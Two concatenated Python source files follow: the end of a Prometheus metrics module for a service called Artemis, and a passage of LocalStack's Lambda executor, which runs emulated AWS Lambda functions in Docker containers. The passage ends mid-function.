'package_version': __VERSION__,
'image_digest': os.getenv('ARTEMIS_IMAGE_DIGEST', '<undefined>'),
'image_url': os.getenv('ARTEMIS_IMAGE_URL', '<undefined>')
})
self.IDENTITY_INFO.info({
'api_node': platform.node(),
'artemis_deployment': os.getenv('ARTEMIS_DEPLOYMENT', '<undefined>')
})
@with_context
def render_prometheus_metrics(self, db: artemis_db.DB) -> Result[bytes, Failure]:
"""
Render plaintext output of Prometheus metrics representing values in this tree of metrics.
.. note::
**Requires** the context variables defined in :py:mod:`tft.artemis` to be set properly.
:param db: DB instance to use for DB access.
:returns: plaintext representation of Prometheus metrics, encoded as ``bytes``.
"""
def _render() -> bytes:
with db.get_session() as session:
SESSION.set(session)
self.sync()
self.update_prometheus()
return cast(bytes, generate_latest(registry=self._registry))
return safe_call(_render)
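# A hedged end-to-end sketch, assuming the context variables required by
# `render_prometheus_metrics` (DB, cache, logger) have been set up elsewhere:
#
#     metrics = Metrics()
#     metrics.register_with_prometheus(CollectorRegistry())
#     r_payload = metrics.render_prometheus_metrics()
#     if r_payload.is_ok:
#         print(r_payload.unwrap().decode())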
def upsert_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any],
change: int
) -> None:
"""
Update a stored value of a given metric.
Wrapper for :py:func:`tft.artemis.db.upsert` to simplify its use when it comes to metrics. With metrics, we work
with the following assumptions:
* model (table) has one or more primary keys,
* model has a "counter" column (called ``count``) which holds the value of the metric specified by primary keys.
Therefore, this helper focuses on changing the counter, using primary keys to limit the change, or initialize
the row if it doesn't exist yet.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. This mapping is used to limit
the update to a particular record, or initialize new record if it doesn't exist yet.
Primary keys - keys of the mapping - should be the columns of the given model.
:param change: amount to add to ``count``.
"""
# TODO: actually check if result of upsert was successful
artemis_db.upsert(
logger,
session,
model,
primary_keys,
insert_data={getattr(model, 'count'): 1},
update_data={'count': getattr(model, 'count') + change}
)
def upsert_inc_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any]
) -> None:
"""
Increment a metric counter by 1.
Implemented as a thin wrapper for :py:func:`upsert_metric`, therefore the parameters share their meaning.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. See :py:func:`upsert_metric`
for more details.
"""
upsert_metric(logger, session, model, primary_keys, 1)
def upsert_dec_metric(
logger: gluetool.log.ContextAdapter,
session: sqlalchemy.orm.session.Session,
model: Type[artemis_db.Base],
primary_keys: Dict[Any, Any]
) -> None:
"""
Decrement a metric counter by 1.
Implemented as a thin wrapper for :py:func:`upsert_metric`, therefore the parameters share their meaning.
:param logger: logger to use for logging.
:param session: DB session to use for DB access.
:param model: SQLAlchemy model representing the metrics table we need to update.
:param primary_keys: mapping of primary keys and their expected values. See :py:func:`upsert_metric`
for more details.
"""
upsert_metric(logger, session, model, primary_keys, -1)
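# For example (sketch; `PoolErrors` and its columns are hypothetical):
#
#     upsert_inc_metric(logger, session, PoolErrors, {
#         PoolErrors.poolname: 'aws',
#         PoolErrors.error: 'quota-exceeded'
#     })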
def inc_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
amount: int = 1
) -> None:
"""
Increment a metric counter by ``amount``. If the metric does not exist yet, it is set to ``0`` and incremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric to increment.
:param amount: amount to increment by.
"""
inc_cache_value(logger, cache, metric, amount=amount)
def dec_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
amount: int = 1
) -> None:
"""
Decrement a metric counter by ``amount``. If the metric does not exist yet, it is set to ``0`` and decremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric to decrement.
:param amount: amount to decrement by.
"""
dec_cache_value(logger, cache, metric, amount=amount)
def inc_metric_field(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
field: str,
amount: int = 1
) -> None:
"""
Increment a metric field counter by ``amount``. If the metric field does not exist yet, it is set to ``0`` and incremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: parent metric to access.
:param field: field to increment.
:param amount: amount to increment by.
"""
inc_cache_field(logger, cache, metric, field, amount=amount)
def dec_metric_field(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
field: str,
amount: int = 1
) -> None:
"""
Decrement a metric field counter by ``amount``. If the metric field does not exist yet, it is set to ``0`` and decremented.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: parent metric to access.
:param field: field to decrement.
:param amount: amount to decrement by.
"""
dec_cache_field(logger, cache, metric, field, amount=amount)
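# Composite keys are encoded into field names with ':' separators, matching how
# the `sync()` methods above split them back. For example (illustrative):
#
#     inc_metric_field(logger, cache, 'metrics.provisioning.failover', 'aws:gcp')
#     # ...is later read back as {'aws:gcp': 1} and split into ('aws', 'gcp').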
def get_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str
) -> Optional[int]:
"""
Return a metric counter for the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to retrieve.
:returns: value of the metric.
"""
# Redis returns everything as bytes, therefore we need to decode field names to present them as strings
# and convert values to integers. To make things more complicated, lack of type annotations forces us
# to wrap `get` with `cast` calls.
value: Optional[bytes] = get_cache_value(logger, cache, metric)
return value if value is None else int(value)
def set_metric(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str,
value: Optional[int] = None,
ttl: Optional[int] = None
) -> None:
"""
Set a metric counter for the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to set.
:param value: value to set to.
:param ttl: if set, the metric will expire in ``ttl`` seconds and be removed from the cache.
"""
# Redis stores everything as bytes, therefore we encode the value before storing it.
set_cache_value(logger, cache, metric, value=str(value).encode() if value is not None else None, ttl=ttl)
def get_metric_fields(
logger: gluetool.log.ContextAdapter,
cache: redis.Redis,
metric: str
) -> Dict[str, int]:
"""
Return a mapping between fields and corresponding counters representing the given metric.
:param logger: logger to use for logging.
:param cache: cache instance to use for cache access.
:param metric: metric name to retrieve.
:returns: mapping between field and counters.
"""
# Redis returns everything as bytes, therefore we need to decode field names to present them as strings
# and convert values to integers. To make things more complicated, lack of type annotations forces us
# to wrap `hgetall` with `cast` calls.
return {
field.decode(): int(value)
for field, value in iter_cache_fields(logger, cache, metric)
}
|
lambda_executors.py | import os
import re
import sys
import glob
import json
import time
import logging
import threading
import traceback
import subprocess
import six
import base64
from multiprocessing import Process, Queue
try:
from shlex import quote as cmd_quote
except ImportError:
from pipes import quote as cmd_quote # for Python 2.7
from localstack import config
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.common import (
CaptureOutput, FuncThread, TMP_FILES, short_uid, save_file, rm_rf, in_docker, long_uid,
now, to_str, to_bytes, run, cp_r, json_safe, get_free_tcp_port, rm_docker_container)
from localstack.services.install import INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils.aws.dead_letter_queue import lambda_error_to_dead_letter_queue
from localstack.utils.aws.dead_letter_queue import sqs_error_to_dead_letter_queue
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import store_cloudwatch_logs, cloudwatched
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11, LAMBDA_RUNTIME_PROVIDED)
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = 'cloud.localstack.LambdaExecutor'
EVENT_FILE_PATTERN = '%s/lambda.event.*.json' % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = 'aws:sqs'
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = '/var/task'
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
def get_from_event(event, key):
try:
return event['Records'][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, 'runtime', lambda_details) or ''
return runtime.startswith('nodejs')
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = '/aws/lambda/%s' % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime('%Y/%m/%d', time.gmtime(invocation_time_secs))
log_stream_name = '%s/[LATEST]%s' % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info('Determined main container target IP: %s' % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info('Unable to get IP address of main Docker container "%s": %s' %
(container_name, e))
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
class InvocationResult(object):
def __init__(self, result, log_output=''):
if isinstance(result, InvocationResult):
raise Exception('Unexpected invocation result type: %s' % result)
self.result = result
self.log_output = log_output or ''
class LambdaExecutor(object):
""" Base class for Lambda executors. Subclasses must overwrite the _execute method """
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(self, func_arn, func_details, event, context=None, version=None,
asynchronous=False, callback=None):
def do_execute(*args):
@cloudwatched('lambda')
def _run(func_arn=None):
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, 'eventSource') == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, 'eventSourceARN')
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(sqs_queue_arn, event, e)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(result, func_arn, event, error=raised_error, dlq_sent=dlq_sent)
lambda_result_to_destination(func_details, event, result, asynchronous, raised_error)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug('Lambda executed in Event (asynchronous) mode, no response will be returned to caller')
FuncThread(do_execute).start()
return InvocationResult(None, log_output='Lambda executed asynchronously.')
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
""" This method must be overwritten by subclasses. """
raise Exception('Not implemented.')
def startup(self):
pass
def cleanup(self, arn=None):
pass
def run_lambda_executor(self, cmd, event=None, func_details=None, env_vars=None):
kwargs = {'stdin': True, 'inherit_env': True, 'asynchronous': True}
env_vars = env_vars or {}
runtime = func_details.runtime or ''
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if func_details and is_provided and env_vars.get('DOCKER_LAMBDA_USE_STDIN') == '1':
# Note: certain "provided" runtimes (e.g., Rust programs) can block when we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
'PATH': env_vars.get('PATH') or os.environ.get('PATH', ''),
'AWS_LAMBDA_EVENT_BODY': to_str(event),
'DOCKER_LAMBDA_USE_STDIN': '1'
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop('AWS_LAMBDA_COGNITO_IDENTITY', None)
event = None
cmd = re.sub(r'(.*)(%s\s+(run|start))' % self._docker_cmd(), r'\1echo $AWS_LAMBDA_EVENT_BODY | \2', cmd)
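# Illustrative effect of the rewrite above (command shortened):
#   'docker run --rm <image>'  =>  'echo $AWS_LAMBDA_EVENT_BODY | docker run --rm <image>'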
process = run(cmd, env_vars=env_vars, stderr=subprocess.PIPE, outfile=subprocess.PIPE, **kwargs)
result, log_output = process.communicate(input=event)
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
return_code = process.returncode
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, six.string_types) and '\n' in result:
additional_logs, _, result = result.rpartition('\n')
log_output += '\n%s' % additional_logs
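# For example (illustrative): a result of 'debug line\n{"ok": true}' yields
# result == '{"ok": true}', with 'debug line' appended to the log output.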
log_formatted = log_output.strip().replace('\n', '\n> ')
func_arn = func_details and func_details.arn()
LOG.debug('Lambda %s result / log output:\n%s\n> %s' % (func_arn, result.strip(), log_formatted))
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if return_code != 0:
raise InvocationException('Lambda process returned error status code: %s. Result: %s. Output:\n%s' %
(return_code, result, log_output), log_output, result)
invocation_result = InvocationResult(result, log_output=log_output)
return invocation_result
class ContainerInfo:
""" Contains basic information about a docker container. """
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
""" Abstract executor class for executing Lambda functions in Docker containers """
def prepare_execution(self, func_details, env_vars, command):
raise Exception('Not implemented')
def _docker_cmd(self):
""" Return the string to be used for running Docker commands. """
return config.DOCKER_CMD
def prepare_event(self, environment, event_body):
""" Return the event as a stdin string. """
# amend the environment variables for execution
environment['AWS_LAMBDA_EVENT_BODY'] = event_body
return None
def _execute(self, func_arn, func_details, event, context=None, version=None):
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment['USE_SSL'] = '1'
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
stdin = self.prepare_event(environment, event_body)
main_endpoint = get_main_endpoint_from_container()
environment['LOCALSTACK_HOSTNAME'] = main_endpoint
environment['EDGE_PORT'] = str(config.EDGE_PORT)
environment['_HANDLER'] = handler
if os.environ.get('HTTP_PROXY'):
environment['HTTP_PROXY'] = os.environ['HTTP_PROXY']
if func_details.timeout:
environment['AWS_LAMBDA_FUNCTION_TIMEOUT'] = str(func_details.timeout)
if context:
environment['AWS_LAMBDA_FUNCTION_NAME'] = context.function_name
environment['AWS_LAMBDA_FUNCTION_VERSION'] = context.function_version
environment['AWS_LAMBDA_FUNCTION_INVOKED_ARN'] = context.invoked_function_arn
environment['AWS_LAMBDA_COGNITO_IDENTITY'] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment['AWS_LAMBDA_CLIENT_CONTEXT'] = json.dumps(to_str(
base64.b64decode(to_bytes(context.client_context))))
# custom command to execute in the container
command = ''
events_file_path = ''
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
# if running a Java Lambda with our custom executor, set up classpath arguments
java_opts = Util.get_java_opts()
stdin = None
# copy executor jar into temp directory
target_file = os.path.join(lambda_cwd, os.path.basename(LAMBDA_EXECUTOR_JAR))
if not os.path.exists(target_file):
cp_r(LAMBDA_EXECUTOR_JAR, target_file)
# TODO cleanup once we have custom Java Docker image
events_file = '_lambda.events.%s.json' % short_uid()
events_file_path = os.path.join(lambda_cwd, events_file)
save_file(events_file_path, event_body)
# construct Java command
classpath = Util.get_java_classpath(target_file)
command = ("bash -c 'cd %s; java %s -cp \"%s\" \"%s\" \"%s\" \"%s\"'" %
(DOCKER_TASK_FOLDER, java_opts, classpath, LAMBDA_EXECUTOR_CLASS, handler, events_file))
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment['NODE_TLS_REJECT_UNAUTHORIZED'] = '0'
# determine the command to be executed (implemented by subclasses)
cmd = self.prepare_execution(func_details, environment, command)
# copy events file into container, if necessary
if events_file_path:
container_name = self.get_container_name(func_details.arn())
self.copy_into_container(events_file_path, container_name, DOCKER_TASK_FOLDER)
# run Lambda executor and fetch invocation result
LOG.info('Running lambda cmd: %s' % cmd)
result = self.run_lambda_executor(cmd, stdin, env_vars=environment, func_details=func_details)
# clean up events file
events_file_path and os.path.exists(events_file_path) and rm_rf(events_file_path)
# TODO: delete events file from container!
return result
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
""" Executor class for executing Lambda functions in re-usable Docker containers """
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def prepare_execution(self, func_details, env_vars, command):
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars['_LAMBDA_SERVER_PORT'] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug('Priming docker container with runtime "%s" and arn "%s".', runtime, func_arn)
container_info = self.prime_docker_container(func_details, env_vars.items(), lambda_cwd)
# Note: currently "docker exec" does not support --env-file, i.e., environment variables can only be
# passed directly on the command line, using "-e" below. TODO: Update this code once --env-file is
# available for docker exec, to better support very large Lambda events (very long environment values)
exec_env_vars = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
if not command:
command = '%s %s' % (container_info.entry_point, handler)
# determine files to be copied into the container
copy_command = ''
docker_cmd = self._docker_cmd()
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
copy_command = '%s cp "%s/." "%s:%s";' % (docker_cmd,
lambda_cwd, container_info.name, DOCKER_TASK_FOLDER)
cmd = (
'%s'
' %s exec'
' %s' # env variables
' %s' # container name
' %s' # run cmd
) % (copy_command, docker_cmd, exec_env_vars, container_info.name, command)
LOG.debug('Command for docker-reuse Lambda executor: %s' % cmd)
return cmd
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The details of the lambda function, including its ARN and
runtime (e.g., python2.7, nodejs6.10).
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug('Creating container: %s' % container_name)
cmd = self.get_container_startup_command(func_details, env_vars, lambda_cwd)
LOG.debug(cmd)
run(cmd)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug('Copying files to container "%s" from "%s".' % (container_name, lambda_cwd))
self.copy_into_container('%s/.' % lambda_cwd, container_name, DOCKER_TASK_FOLDER)
LOG.debug('Starting container: %s' % container_name)
cmd = '%s start %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = self.get_container_entrypoint(docker_image)
LOG.debug('Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network))
return ContainerInfo(container_name, entry_point)
def get_container_startup_command(self, func_details, env_vars, lambda_cwd):
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
docker_cmd = self._docker_cmd()
container_name = self.get_container_name(func_details.arn())
env_vars_str = ' '.join(['-e {}={}'.format(k, cmd_quote(v)) for (k, v) in env_vars])
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
additional_flags = config.LAMBDA_DOCKER_FLAGS or ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
mount_volume = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if (':' in lambda_cwd and '\\' in lambda_cwd):
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volume_str = '-v "%s":%s' % (lambda_cwd_on_host, DOCKER_TASK_FOLDER) if mount_volume else ''
# Create and start the container
cmd = (
'%s create'
' %s' # --rm flag
' --name "%s"'
' --entrypoint /bin/bash' # Load bash when it starts.
' %s'
' --interactive' # Keeps the container running bash.
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' -e LOCALSTACK_HOSTNAME="$LOCALSTACK_HOSTNAME"'
' -e EDGE_PORT="$EDGE_PORT"'
' %s' # env_vars
' %s' # network
' %s' # dns
' %s' # additional flags
' %s'
) % (docker_cmd, rm_flag, container_name, mount_volume_str,
env_vars_str, network_str, dns_str, additional_flags, docker_image)
return cmd
def get_container_entrypoint(self, docker_image):
""" Get the entry point for the given image """
docker_cmd = self._docker_cmd()
LOG.debug('Getting the entrypoint for image: %s' % (docker_image))
cmd = (
'%s image inspect'
' --format="{{ .Config.Entrypoint }}"'
' %s'
) % (docker_cmd, docker_image)
LOG.debug(cmd)
run_result = run(cmd)
entry_point = run_result.strip('[]\n\r ')
return entry_point
def copy_into_container(self, local_path, container_name, container_path):
cmd = ('%s cp %s "%s:%s"') % (self._docker_cmd(), local_path, container_name, container_path)
LOG.debug(cmd)
run(cmd)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
docker_cmd = self._docker_cmd()
# Get the container name and id.
container_name = self.get_container_name(func_arn)
if status == 1:
LOG.debug('Stopping container: %s' % container_name)
cmd = '%s stop -t0 %s' % (docker_cmd, container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
status = self.get_docker_container_status(func_arn)
if status == -1:
LOG.debug('Removing container: %s' % container_name)
rm_docker_container(container_name, safe=True)
def get_all_container_names(self):
"""
Returns a list of container names for lambda containers.
:return: A list of localstack docker container names, one per function.
"""
with self.docker_container_lock:
LOG.debug('Getting all lambda container names.')
cmd = '%s ps -a --filter="name=localstack_lambda_*" --format "{{.Names}}"' % self._docker_cmd()
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE).strip()
if len(cmd_result) > 0:
container_names = cmd_result.split('\n')
else:
container_names = []
return container_names
def destroy_existing_docker_containers(self):
"""
Stops and/or removes all lambda docker containers for localstack.
:return: None
"""
with self.docker_container_lock:
container_names = self.get_all_container_names()
LOG.debug('Removing %d containers.' % len(container_names))
for container_name in container_names:
cmd = '%s rm -f %s' % (self._docker_cmd(), container_name)
LOG.debug(cmd)
run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
def get_docker_container_status(self, func_arn):
"""
Determine the status of a docker container.
:param func_arn: The ARN of the lambda function.
:return: 1 If the container is running,
-1 if the container exists but is not running
0 if the container does not exist.
"""
with self.docker_container_lock:
# Get the container name and id.
container_name = self.get_container_name(func_arn)
# Check if the container is already running
# Note: filtering by *exact* name using regex filter '^...$' seems unstable on some
# systems. Therefore, we use a combination of filter and grep to get the results.
cmd = ("docker ps -a --filter name='%s' "
'--format "{{ .Status }} - {{ .Names }}" '
'| grep -w "%s" | cat') % (container_name, container_name)
LOG.debug('Getting status for container "%s": %s' % (container_name, cmd))
cmd_result = run(cmd)
# Parse the container status from the command output.
container_status = cmd_result.strip()
if len(container_status) == 0:
return 0
if container_status.lower().startswith('up '):
return 1
return -1
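# Illustrative mapping (assumed `docker ps` output) of status strings to the
# return codes documented above:
# '' (no matching container) -> 0
# 'Up 5 minutes - localstack_lambda_f1' -> 1 (starts with 'up ')
# 'Exited (0) 2 minutes ago - localstack_lambda_f1' -> -1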
def get_docker_container_network(self, func_arn):
"""
Determine the network of a docker container.
:param func_arn: The ARN of the lambda function.
:return: name of the container network
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# container does not exist
if status == 0:
return ''
# Get the container name.
container_name = self.get_container_name(func_arn)
docker_cmd = self._docker_cmd()
# Get the container network
LOG.debug('Getting container network: %s' % container_name)
cmd = (
'%s inspect %s'
' --format "{{ .HostConfig.NetworkMode }}"'
) % (docker_cmd, container_name)
LOG.debug(cmd)
cmd_result = run(cmd, asynchronous=False, stderr=subprocess.PIPE, outfile=subprocess.PIPE)
container_network = cmd_result.strip()
return container_network
def idle_container_destroyer(self):
"""
Iterates through all the lambda containers and destroys any container that has
been inactive for longer than MAX_CONTAINER_IDLE_TIME_MS.
:return: None
"""
LOG.debug('Checking if there are idle containers ...')
current_time = int(time.time() * 1000)
for func_arn, last_run_time in dict(self.function_invoke_times).items():
duration = current_time - last_run_time
# not enough idle time has passed
if duration < MAX_CONTAINER_IDLE_TIME_MS:
continue
# container has been idle, destroy it.
self.destroy_docker_container(func_arn)
def start_idle_container_destroyer_interval(self):
"""
Starts a repeating timer that re-invokes itself every 60 seconds,
checking for idle containers and destroying them.
:return: None
"""
self.idle_container_destroyer()
threading.Timer(60.0, self.start_idle_container_destroyer_interval).start()
def get_container_name(self, func_arn):
"""
Given a function ARN, returns a valid docker container name.
:param func_arn: The ARN of the lambda function.
:return: A docker compatible name for the arn.
"""
return 'localstack_lambda_' + re.sub(r'[^a-zA-Z0-9_.-]', '_', func_arn)
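# Illustrative example (assumed ARN): every character outside [a-zA-Z0-9_.-]
# is replaced with an underscore to produce a docker-safe name:
# >>> re.sub(r'[^a-zA-Z0-9_.-]', '_', 'arn:aws:lambda:us-east-1:000000000000:function:my-func')
# 'arn_aws_lambda_us-east-1_000000000000_function_my-func'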
class LambdaExecutorSeparateContainers(LambdaExecutorContainers):
def __init__(self):
super(LambdaExecutorSeparateContainers, self).__init__()
self.max_port = LAMBDA_API_UNIQUE_PORTS
self.port_offset = LAMBDA_API_PORT_OFFSET
def prepare_event(self, environment, event_body):
# Tell Lambci to use STDIN for the event
environment['DOCKER_LAMBDA_USE_STDIN'] = '1'
return event_body.encode()
def prepare_execution(self, func_details, env_vars, command):
lambda_cwd = func_details.cwd
handler = func_details.handler
entrypoint = ''
if command:
entrypoint = ' --entrypoint ""'
elif handler:
command = '"%s"' % handler
else:
command = ''
# add Docker Lambda env vars
network = config.LAMBDA_DOCKER_NETWORK
network_str = '--network="%s"' % network if network else ''
if network == 'host':
port = get_free_tcp_port()
env_vars['DOCKER_LAMBDA_API_PORT'] = str(port)
env_vars['DOCKER_LAMBDA_RUNTIME_PORT'] = str(port)
additional_flags = config.LAMBDA_DOCKER_FLAGS or ''
dns = config.LAMBDA_DOCKER_DNS
dns_str = '--dns="%s"' % dns if dns else ''
env_vars_string = ' '.join(['-e {}="${}"'.format(k, k) for (k, v) in env_vars.items()])
debug_docker_java_port = '-p {p}:{p}'.format(p=Util.debug_java_port) if Util.debug_java_port else ''
docker_cmd = self._docker_cmd()
docker_image = Util.docker_image_for_lambda(func_details)
rm_flag = Util.get_docker_remove_flag()
# construct common flags for commands below
